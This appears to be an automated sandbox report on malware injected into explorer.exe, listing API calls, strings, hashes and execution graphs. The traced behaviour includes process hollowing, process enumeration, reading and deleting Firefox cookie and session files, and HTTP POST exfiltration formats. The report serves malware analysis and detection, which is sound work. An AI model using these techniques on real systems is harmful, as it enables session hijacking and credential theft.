                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00CE3385
                              • Part of subcall function 00CE1011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,00CE14CB), ref: 00CE1020
                              • Part of subcall function 00CE1011: HeapFree.KERNEL32(00000000), ref: 00CE1027
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: Heaplstrcatlstrlen$FreeMemoryMoveProcesswsprintf
                            • String ID: %s{:!:}%s{:!:}%s{:!:}$POST${:!:}
                            • API String ID: 3430864794-1604029033
                            • Opcode ID: e8a46ea6bce34381c46e81d71e8cbe73491601f3f7b07922cd456a224b5d1c1e
                            • Instruction ID: b4eb7271bd3e6535f44415011e4f6b927aef2364462791af0e24efac8d838d3f
                            • Opcode Fuzzy Hash: e8a46ea6bce34381c46e81d71e8cbe73491601f3f7b07922cd456a224b5d1c1e
                            • Instruction Fuzzy Hash: 04417C71108385AFD3159F11DC88F6FBBEDFB84345F04092EF98296251DB74AA488BA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • RtlEnterCriticalSection.NTDLL(00CE6030), ref: 00CE34F0
                            • lstrcat.KERNEL32(?), ref: 00CE3545
                              • Part of subcall function 00CE305D: RtlZeroMemory.NTDLL(?,0000000A), ref: 00CE30AD
                              • Part of subcall function 00CE305D: StrToIntA.SHLWAPI(?), ref: 00CE30D7
                              • Part of subcall function 00CE305D: lstrlen.KERNEL32(00000000), ref: 00CE3105
                              • Part of subcall function 00CE305D: wsprintfA.USER32 ref: 00CE316C
                              • Part of subcall function 00CE305D: lstrcat.KERNEL32(00000000,00000000), ref: 00CE3198
                              • Part of subcall function 00CE105D: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00CE1065
                            • RtlZeroMemory.NTDLL(0000000A,0000000A), ref: 00CE359E
                            • StrToIntA.SHLWAPI(?), ref: 00CE35C5
                            • RtlMoveMemory.NTDLL(00000000,?,-00000003), ref: 00CE3629
                            • RtlLeaveCriticalSection.NTDLL(00CE6030), ref: 00CE365D
                              • Part of subcall function 00CE1274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00CE1281
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: Memory$CriticalSectionVirtualZerolstrcat$EnterFreeLeaveMoveQuerylstrlenwsprintf
                            • String ID: $Content-Length:$POST
                            • API String ID: 2577380748-114478848
                            • Opcode ID: 436169088476d0b70812bcb828bb01ec1d5c6f99448ce8915d6370c268b32209
                            • Instruction ID: 464ed4c23f3e0623f3873b5d2be6e9d39987d5a4fc6a928f3bedfbd453e6ab55
                            • Opcode Fuzzy Hash: 436169088476d0b70812bcb828bb01ec1d5c6f99448ce8915d6370c268b32209
                            • Instruction Fuzzy Hash: FB41D4316013D0ABCB24EF63ACC872E3B69AB94350F14042DF9164B352CB359B08D765
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00CE1000: GetProcessHeap.KERNEL32(00000008,00000208,00CE1418), ref: 00CE1003
                              • Part of subcall function 00CE1000: RtlAllocateHeap.NTDLL(00000000), ref: 00CE100A
                              • Part of subcall function 00CE106C: lstrlen.KERNEL32 ref: 00CE1074
                              • Part of subcall function 00CE106C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001), ref: 00CE1086
                              • Part of subcall function 00CE17B5: RtlZeroMemory.NTDLL(?,00000018), ref: 00CE17C7
                            • RtlZeroMemory.NTDLL(?,0000003C), ref: 00CE199A
                            • wsprintfW.USER32 ref: 00CE1AD3
                            • wsprintfW.USER32 ref: 00CE1B3E
                            • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00CE1C08
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                            • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                            • API String ID: 4204651544-1701262698
                            • Opcode ID: 10a26b03369b48778ecf6f678cfe972ab51a1818463af81c36f9acdd228b3257
                            • Instruction ID: 239b76734d8d9d8a91c478bdbe3c6357872b48e206a59e07a3cfc32453f8e30c
                            • Opcode Fuzzy Hash: 10a26b03369b48778ecf6f678cfe972ab51a1818463af81c36f9acdd228b3257
                            • Instruction Fuzzy Hash: 94A18C71608384AFD714DF6AD884B2FBBE9EF88340F18092DF996C7251DA34DD548B52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00CE1363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CE1374
                              • Part of subcall function 00CE1363: Process32First.KERNEL32(00000000,?), ref: 00CE1393
                              • Part of subcall function 00CE1363: CloseHandle.KERNEL32(00000000), ref: 00CE13CB
                            • Sleep.KERNEL32(000003E8,?,00000000,?,00CE38DE,?,00CE3C5C,00000001), ref: 00CE375D
                              • Part of subcall function 00CE1000: GetProcessHeap.KERNEL32(00000008,00000208,00CE1418), ref: 00CE1003
                              • Part of subcall function 00CE1000: RtlAllocateHeap.NTDLL(00000000), ref: 00CE100A
                            • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,?,00CE38DE,?,00CE3C5C,00000001), ref: 00CE3776
                            • lstrcatW.KERNEL32(00000000,\Mozilla\Firefox\Profiles\), ref: 00CE3786
                              • Part of subcall function 00CE14D8: wsprintfW.USER32 ref: 00CE150D
                              • Part of subcall function 00CE14D8: FindFirstFileW.KERNEL32(00000000,?), ref: 00CE151C
                              • Part of subcall function 00CE14D8: wsprintfW.USER32 ref: 00CE1557
                              • Part of subcall function 00CE14D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 00CE156A
                              • Part of subcall function 00CE14D8: DeleteFileW.KERNEL32(00000000), ref: 00CE1571
                              • Part of subcall function 00CE14D8: FindNextFileW.KERNEL32(00000000,00000010), ref: 00CE1584
                              • Part of subcall function 00CE14D8: FindClose.KERNEL32(00000000), ref: 00CE158F
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: File$Find$CloseFirstHeapwsprintf$AllocateAttributesCreateDeleteFolderHandleNextPathProcessProcess32SleepSnapshotSpecialToolhelp32lstrcat
                            • String ID: \Mozilla\Firefox\Profiles\$cookies.sqlite$firefox.exe$sessionstore.*
                            • API String ID: 2731919298-637609321
                            • Opcode ID: 928d604666657ff06a2b9f07aa95ce226634b2fa40c7784cf4b5f157f580d3d0
                            • Instruction ID: ae2c03b6ae9a0994589efbe7e14bd91086e4a859a9e4dbe9888afac725ed935b
                            • Opcode Fuzzy Hash: 928d604666657ff06a2b9f07aa95ce226634b2fa40c7784cf4b5f157f580d3d0
                            • Instruction Fuzzy Hash: 53F0A0B13011D0379A2C33676C4EE3F296EDFD7B52704002CF5169A2D18E280A4252BA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00CE104C: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00CE1056
                            • lstrcat.KERNEL32(?,00000000), ref: 00CE2710
                            • lstrcat.KERNEL32(?,00CE42C4), ref: 00CE271C
                            • lstrcat.KERNEL32(?,?), ref: 00CE272B
                            • lstrcat.KERNEL32(?,00CE42C8), ref: 00CE273A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: lstrcat$AllocVirtual
                            • String ID: :authority$?$dyn_header
                            • API String ID: 3028025275-1785586894
                            • Opcode ID: 81a259412fc565d244f8cc5fc6e4fcc8feb88a98d71e398a6cc2c2ecf62b334b
                            • Instruction ID: ecbf78a2b1bdaa081eac5aede1f90fb4fbeca7569c804fc06e01eee49b94e81a
                            • Opcode Fuzzy Hash: 81a259412fc565d244f8cc5fc6e4fcc8feb88a98d71e398a6cc2c2ecf62b334b
                            • Instruction Fuzzy Hash: 986106725083D28FC718DE27C59176EB7EE9B94310F050A2DF49157282DB389E4DEBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CE1374
                            • Process32First.KERNEL32(00000000,?), ref: 00CE1393
                            • lstrcmpi.KERNEL32(?), ref: 00CE13A3
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00CE13C0
                            • CloseHandle.KERNEL32(00000000), ref: 00CE13CB
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                            • String ID:
                            • API String ID: 868014591-0
                            • Opcode ID: 9960524654bee6baa002f9d2a0462426c1dd0099fd410cdcabda2f0e4b2d416f
                            • Instruction ID: d7c31f4794f9d3406af451aa3bc78ebe16b97ac7b0fe30733bda4f066571aad7
                            • Opcode Fuzzy Hash: 9960524654bee6baa002f9d2a0462426c1dd0099fd410cdcabda2f0e4b2d416f
                            • Instruction Fuzzy Hash: CAF0FC359011945BC7346B26DC8CFDE77BCDF49321F0401A1FE55D61A0EB744EA48A50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00CE1141: lstrlen.KERNEL32(00000000,00001000,?,00000000,00000000,00CE32FE,00000001), ref: 00CE1150
                              • Part of subcall function 00CE1141: lstrlen.KERNEL32(00CE4420), ref: 00CE1155
                            • RtlMoveMemory.NTDLL(?,?,-00000008), ref: 00CE2A70
                            • lstrcat.KERNEL32(?,00CE42D8), ref: 00CE2A7F
                            • lstrlen.KERNEL32(?,?,00000001), ref: 00CE2AB1
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: lstrlen$MemoryMovelstrcat
                            • String ID: cookie
                            • API String ID: 2957667536-1295510418
                            • Opcode ID: f7ba41818b961a8551deb455ee88222aafd23bfd1d261229024833979dfe90dc
                            • Instruction ID: 36d5a1d1c293731cb3a798873e3383f879d1cf60000c184ec4d864b4dce14986
                            • Opcode Fuzzy Hash: f7ba41818b961a8551deb455ee88222aafd23bfd1d261229024833979dfe90dc
                            • Instruction Fuzzy Hash: 8B1106723043815BC7249E96EC86B6FB29DDF80B14F1C0539FE1197251EAB1ED0553A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • OpenProcess.KERNEL32(00000400,00000000), ref: 00CE12BC
                            • IsWow64Process.KERNEL32(000000FF,?), ref: 00CE12CE
                            • IsWow64Process.KERNEL32(00000000,?), ref: 00CE12E1
                            • CloseHandle.KERNEL32(00000000), ref: 00CE12F7
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: Process$Wow64$CloseHandleOpen
                            • String ID:
                            • API String ID: 331459951-0
                            • Opcode ID: 1ca02d70f183a5ff6e212dea64d835bb9522a166f387eb0e2924e3fca5b81537
                            • Instruction ID: f8a09bf2908069049c4762524e2d767468291fed1be084cc0584aca022e08c4a
                            • Opcode Fuzzy Hash: 1ca02d70f183a5ff6e212dea64d835bb9522a166f387eb0e2924e3fca5b81537
                            • Instruction Fuzzy Hash: 3EF09072802298FF9B14DF919D89AEE7B6CEA05251F18026AEE20E6140D7304F0496A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00CE1274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00CE1281
                            • RtlEnterCriticalSection.NTDLL(00CE6030), ref: 00CE33CD
                            • RtlLeaveCriticalSection.NTDLL(00CE6030), ref: 00CE33F3
                              • Part of subcall function 00CE305D: RtlZeroMemory.NTDLL(?,0000000A), ref: 00CE30AD
                              • Part of subcall function 00CE305D: StrToIntA.SHLWAPI(?), ref: 00CE30D7
                              • Part of subcall function 00CE305D: lstrlen.KERNEL32(00000000), ref: 00CE3105
                              • Part of subcall function 00CE305D: wsprintfA.USER32 ref: 00CE316C
                              • Part of subcall function 00CE305D: lstrcat.KERNEL32(00000000,00000000), ref: 00CE3198
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterLeaveMemoryQueryVirtualZerolstrcatlstrlenwsprintf
                            • String ID: POST
                            • API String ID: 2633601563-1814004025
                            • Opcode ID: 2fc2600ccecb83581fffc10b1cdd45df9231b425e1826da0d2f9669c81f0df3c
                            • Instruction ID: 06cc0d5692cd18077c4e4ceec17943f35a72b4e30f66b05ce3542634941e7c55
                            • Opcode Fuzzy Hash: 2fc2600ccecb83581fffc10b1cdd45df9231b425e1826da0d2f9669c81f0df3c
                            • Instruction Fuzzy Hash: 42F02E316042E19BCA156B27ACCEB9F77AEEFC47617040425F15797121CF34AE029762
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:5.5%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:19
                            Total number of Limit Nodes:3

                            Control-flow Graph

                            APIs
                            • NtUnmapViewOfSection.NTDLL ref: 00D152F4
                            Memory Dump Source
                            • Source File: 0000000B.00000002.507771362.0000000000D11000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D11000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_d11000_explorer.jbxd
                            Similarity
                            • API ID: SectionUnmapView
                            • String ID:
                            • API String ID: 498011366-0
                            • Opcode ID: 5f7aa377d8087fab2da093bb130ce73deb8692d8e1c88252bfecd82be534d0bf
                            • Instruction ID: a2a715ed5c29cd8eec82b00d7075b2c5c9eb02b8f3d5ad654c14091b3863dbbb
                            • Opcode Fuzzy Hash: 5f7aa377d8087fab2da093bb130ce73deb8692d8e1c88252bfecd82be534d0bf
                            • Instruction Fuzzy Hash: 8111C624615E08ABEF5CFBB9F4992B93294FB58301F58012AA415C71A5ED3D8AC08331
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00D11B74: OpenFileMappingA.KERNEL32 ref: 00D11B8B
                              • Part of subcall function 00D11B74: MapViewOfFile.KERNELBASE ref: 00D11BAA
                            • SysFreeMap.PGOCR ref: 00D150F1
                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00D150FB
                            • Process32First.KERNEL32 ref: 00D1511E
                            • lstrcmpi.KERNEL32 ref: 00D15135
                            • Process32Next.KERNEL32 ref: 00D15253
                            • FindCloseChangeNotification.KERNELBASE ref: 00D15264
                            • SleepEx.KERNEL32 ref: 00D1526F
                            Memory Dump Source
                            • Source File: 0000000B.00000002.507771362.0000000000D11000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D11000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_d11000_explorer.jbxd
                            Similarity
                            • API ID: FileProcess32$ChangeCloseCreateFindFirstFreeMappingNextNotificationOpenSleepSnapshotToolhelp32Viewlstrcmpi
                            • String ID:
                            • API String ID: 3994516788-0
                            • Opcode ID: 9c499e66052bb8766a1b90497435ee16a6197bb1b06f1221ef9de4edf2b54bed
                            • Instruction ID: 20f2373a550ac65d0ecba058ab371e186570c00f34be4a4e5f5b18aac02c0402
                            • Opcode Fuzzy Hash: 9c499e66052bb8766a1b90497435ee16a6197bb1b06f1221ef9de4edf2b54bed
                            • Instruction Fuzzy Hash: 61518531218E089FDB55EB28FC94BEA73A1FB94300F444629E447C71A5DF78D985CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • LoadLibraryA.KERNELBASE ref: 00D1D7D7
                            • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00D1D881
                            • VirtualProtect.KERNELBASE ref: 00D1D89F
                            Memory Dump Source
                            • Source File: 0000000B.00000002.508095233.0000000000D1C000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D1C000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_d1c000_explorer.jbxd
                            Similarity
                            • API ID: ProtectVirtual$LibraryLoad
                            • String ID:
                            • API String ID: 895956442-0
                            • Opcode ID: 766ecf42a46ccbb9d59950cf19f9f47b0ded34198e0758b122ab6bfde978edc0
                            • Instruction ID: 10801cb8e27d2076fbf45d567af0ba50a31a54400d6246d82b39307bcf758b51
                            • Opcode Fuzzy Hash: 766ecf42a46ccbb9d59950cf19f9f47b0ded34198e0758b122ab6bfde978edc0
                            • Instruction Fuzzy Hash: AC516A3225891D6BCB24AA7CBCC03F5B3D3E755325B58062AC49AC32C5DF68D8C6C3A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 0000000B.00000002.507771362.0000000000D11000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D11000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_d11000_explorer.jbxd
                            Similarity
                            • API ID: File$MappingOpenView
                            • String ID:
                            • API String ID: 3439327939-0
                            • Opcode ID: 3d68cadb71721c25b2f35a99aaf9e4fa7e4534b0fc75c346aa0e398d83fb51cc
                            • Instruction ID: a353ccecbd8cf70fd6d923eb6f393a3ac4a304a185f1c785fa48aabdedc56d84
                            • Opcode Fuzzy Hash: 3d68cadb71721c25b2f35a99aaf9e4fa7e4534b0fc75c346aa0e398d83fb51cc
                            • Instruction Fuzzy Hash: D2F01C35318F094FAB44EF7C9CCC176B7E1EBA9202B048A7EA95AC7165EF34C8818711
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            Memory Dump Source
                            • Source File: 0000000B.00000002.507771362.0000000000D11000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D11000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_d11000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e93eb12f35a254452e59da495d03ddf4922dd92ef586a952151bcee0553a0dce
                            • Instruction ID: 6841ded3e1a8742641a7fdc883fd964e4fc58683446721b2e91e26744e7b9d03
                            • Opcode Fuzzy Hash: e93eb12f35a254452e59da495d03ddf4922dd92ef586a952151bcee0553a0dce
                            • Instruction Fuzzy Hash: 7452DDA684E3C26FD7534B74AC756917FB0AE23224B1E44DBC0C4CF4B3E619598AC762
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            Memory Dump Source
                            • Source File: 0000000B.00000002.507771362.0000000000D11000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D11000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_d11000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e118273b6bd13228560ac9c2cec034c895b25088e2b6ecd5b19a103385d93699
                            • Instruction ID: fac9db4eed86ea0b0d6796918192c9bbc7a97fe52ed8d75f3565c0fac8a14c49
                            • Opcode Fuzzy Hash: e118273b6bd13228560ac9c2cec034c895b25088e2b6ecd5b19a103385d93699
                            • Instruction Fuzzy Hash: FAC1C530618B089FDB59EF6CA8596BE77E1FB98300F14462EE44AC3291DF35D846C792
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 440 d12d60-d12d9b call d11be8 443 d12dad-d12dc3 440->443 444 d12d9d-d12da7 440->444 445 d13057-d1306e 443->445 447 d12dc9-d12dd3 call d11be8 443->447 444->443 444->445 447->445 450 d12dd9-d12de0 447->450 451 d12e01-d12e4a call d12c74 * 2 450->451 452 d12de2-d12df4 450->452 457 d12e50-d12e53 451->457 458 d1304e-d1304f 451->458 452->451 457->458 459 d12e59-d12efb call d12c74 call d12b20 call d12c74 457->459 458->445 470 d13011-d13032 459->470 471 d12f01-d12f20 459->471 474 d13034 470->474 476 d12f22-d12f36 471->476 477 d12f38-d12f3a 471->477 478 d1303a-d13045 474->478 476->471 477->471 479 d12f3c-d12f80 477->479 478->458 486 d13007-d1300a 479->486 487 d12f86-d12fb5 479->487 486->478 488 d1300c-d1300f 486->488 487->486 490 d12fb7-d12ffd 487->490 488->474 490->486
                            Memory Dump Source
                            • Source File: 0000000B.00000002.507771362.0000000000D11000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D11000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_d11000_explorer.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9c5c8b1994fe28c2e4552cb0fb8e0af334840768fe5626a45a9e663353f6e7b3
                            • Instruction ID: e851bbccdfe14cf05c0598ad21e0e7951a9c94f72fc28c96c1630f1351d6274d
                            • Opcode Fuzzy Hash: 9c5c8b1994fe28c2e4552cb0fb8e0af334840768fe5626a45a9e663353f6e7b3
                            • Instruction Fuzzy Hash: 3C91A530718B089FDB59EF68E8596AD77E6FB98700F04422AE44BC3251DF34DA418BD2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:10.6%
                            Dynamic/Decrypted Code Coverage:97.4%
                            Signature Coverage:0%
                            Total number of Nodes:310
                            Total number of Limit Nodes:42
                            execution_graph 988 9d283f 989 9d284b 988->989 990 9d2608 VirtualQuery 988->990 991 9d285f 989->991 992 9d284f GetProcessHeap HeapFree 989->992 990->989 992->991 993 9d245e lstrlen 994 9d24a5 993->994 995 9d2476 CryptBinaryToStringA 993->995 995->994 996 9d2489 995->996 999 9d2861 GetProcessHeap RtlAllocateHeap 996->999 998 9d2494 CryptBinaryToStringA 998->994 999->998 711 9d7728 712 9d7904 711->712 713 9d774b 711->713 712->712 714 9d785a LoadLibraryA 713->714 718 9d789f VirtualProtect VirtualProtect 713->718 715 9d7871 714->715 715->713 717 9d7883 GetProcAddress 715->717 717->715 719 9d7899 717->719 718->712 1006 9d1425 1007 9d144b 1006->1007 1008 9d1432 1006->1008 1009 9d2608 VirtualQuery 1008->1009 1010 9d143a 1009->1010 1010->1007 1011 9d1493 23 API calls 1010->1011 1011->1007 1012 9d2806 VirtualFree 1013 9d1eb6 1014 9d1ecc lstrlen 1013->1014 1015 9d1ed9 1013->1015 1014->1015 1024 9d2861 GetProcessHeap RtlAllocateHeap 1015->1024 1017 9d1ee1 lstrcat 1018 9d1f1d 1017->1018 1019 9d1f16 lstrcat 1017->1019 1025 9d1f4a 1018->1025 1019->1018 1022 9d2843 3 API calls 1023 9d1f40 1022->1023 1024->1017 1059 9d22b8 1025->1059 1029 9d1f77 1064 9d27e2 lstrlen MultiByteToWideChar 1029->1064 1031 9d1f86 1065 9d2374 RtlZeroMemory 1031->1065 1034 9d1fd8 RtlZeroMemory 1036 9d200d 1034->1036 1035 9d2843 3 API calls 1037 9d1f2d 1035->1037 1040 9d229a 1036->1040 1042 9d203b 1036->1042 1067 9d22e5 1036->1067 1037->1022 1039 9d2280 1039->1040 1041 9d2843 3 API calls 1039->1041 1040->1035 1041->1040 1042->1039 1076 9d2861 GetProcessHeap RtlAllocateHeap 1042->1076 1044 9d210b wsprintfW 1045 9d2131 1044->1045 1049 9d219e 1045->1049 1077 9d2861 GetProcessHeap RtlAllocateHeap 1045->1077 1047 9d216b wsprintfW 1047->1049 1048 9d225d 1050 9d2843 3 API calls 1048->1050 1049->1048 1078 9d2861 GetProcessHeap RtlAllocateHeap 1049->1078 1051 9d2271 1050->1051 1051->1039 1053 9d2843 3 API calls 1051->1053 1053->1039 1054 9d21e9 1055 9d2256 1054->1055 1079 9d2815 VirtualAlloc 1054->1079 1057 9d2843 3 API calls 1055->1057 1057->1048 1058 9d2243 RtlMoveMemory 1058->1055 1060 9d1f69 1059->1060 1061 9d22c2 1059->1061 1063 9d2861 GetProcessHeap RtlAllocateHeap 1060->1063 1062 9d26e6 2 API calls 1061->1062 1062->1060 1063->1029 1064->1031 1066 9d1f96 1065->1066 1066->1034 1066->1040 1069 9d22f2 1067->1069 1071 9d2353 1067->1071 1068 9d22f6 DnsQuery_W 1068->1069 1069->1068 1070 9d2335 DnsFree inet_ntoa 1069->1070 1069->1071 1070->1069 1072 9d2355 1070->1072 1071->1042 1080 9d2861 GetProcessHeap RtlAllocateHeap 1072->1080 1074 9d235f 1081 9d27e2 lstrlen MultiByteToWideChar 1074->1081 1076->1044 1077->1047 1078->1054 1079->1058 1080->1074 1081->1071 720 9d1000 721 9d1007 720->721 722 9d1010 720->722 724 9d1016 721->724 772 9d2608 VirtualQuery 724->772 727 9d1097 727->722 729 9d102c RtlMoveMemory 730 9d104d 729->730 731 9d1071 NtUnmapViewOfSection GetCurrentProcessId 729->731 836 9d2861 GetProcessHeap RtlAllocateHeap 730->836 733 9d109e 731->733 734 9d1092 731->734 802 9d10a4 733->802 734->727 775 9d1332 734->775 735 9d1052 RtlMoveMemory 735->731 737 9d10a3 739 9d2861 GetProcessHeap RtlAllocateHeap 737->739 740 9d10cc 739->740 741 9d10dc CreateToolhelp32Snapshot 740->741 742 9d10f0 Process32First 741->742 743 9d1322 Sleep 741->743 744 9d110c lstrcmpi 742->744 745 9d131b FindCloseChangeNotification 742->745 743->741 746 9d1124 lstrcmpi 744->746 747 9d1280 744->747 745->743 746->747 748 9d1138 lstrcmpi 746->748 749 9d25ad OpenProcess IsWow64Process IsWow64Process CloseHandle 747->749 752 9d1305 Process32Next 747->752 760 9d2608 VirtualQuery 747->760 764 9d12ae lstrcmpi 747->764 768 9d1819 30 API calls 747->768 748->747 750 9d114c lstrcmpi 748->750 749->747 750->747 751 9d1160 lstrcmpi 750->751 751->747 753 9d1170 lstrcmpi 751->753 752->744 754 9d1319 752->754 753->747 755 9d1184 lstrcmpi 753->755 754->745 755->747 756 9d1198 lstrcmpi 755->756 756->747 757 9d11ac lstrcmpi 756->757 757->747 758 9d11c0 lstrcmpi 757->758 758->747 759 9d11d4 lstrcmpi 758->759 759->747 761 9d11e8 lstrcmpi 759->761 760->747 761->747 762 9d11fc lstrcmpi 761->762 762->747 763 9d120c lstrcmpi 762->763 763->747 765 9d121c lstrcmpi 763->765 764->747 765->747 766 9d122c lstrcmpi 765->766 766->747 767 9d123c lstrcmpi 766->767 767->747 769 9d124c lstrcmpi 767->769 768->747 769->747 770 9d125c lstrcmpi 769->770 770->747 771 9d126c lstrcmpi 770->771 771->747 771->752 773 9d101e 772->773 773->727 774 9d2861 GetProcessHeap RtlAllocateHeap 773->774 774->729 837 9d2861 GetProcessHeap RtlAllocateHeap 775->837 777 9d1340 GetModuleFileNameA 838 9d2861 GetProcessHeap RtlAllocateHeap 777->838 779 9d1357 GetCurrentProcessId wsprintfA 839 9d263e CryptAcquireContextA 779->839 782 9d140d 862 9d2843 782->862 783 9d139c Sleep 844 9d24d5 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 783->844 786 9d13ae GetModuleHandleA GetProcAddress 788 9d13c9 786->788 789 9d13da GetModuleHandleA GetProcAddress 786->789 852 9d1de3 788->852 792 9d13f5 789->792 793 9d1406 789->793 790 9d2843 3 API calls 794 9d141b RtlExitUserThread 790->794 795 9d1de3 3 API calls 792->795 796 9d24d5 10 API calls 793->796 797 9d1425 794->797 795->793 796->782 798 9d2608 VirtualQuery 797->798 799 9d144b 797->799 800 9d143a 798->800 799->733 800->799 867 9d1493 800->867 935 9d2861 GetProcessHeap RtlAllocateHeap 802->935 804 9d10cc 805 9d10dc CreateToolhelp32Snapshot 804->805 806 9d10f0 Process32First 805->806 807 9d1322 Sleep 805->807 808 9d110c lstrcmpi 806->808 809 9d131b FindCloseChangeNotification 806->809 807->805 810 9d1124 lstrcmpi 808->810 820 9d1280 808->820 809->807 811 9d1138 lstrcmpi 810->811 810->820 813 9d114c lstrcmpi 811->813 811->820 814 9d1160 lstrcmpi 813->814 813->820 816 9d1170 lstrcmpi 814->816 814->820 815 9d1305 Process32Next 815->808 817 9d1319 815->817 818 9d1184 lstrcmpi 816->818 816->820 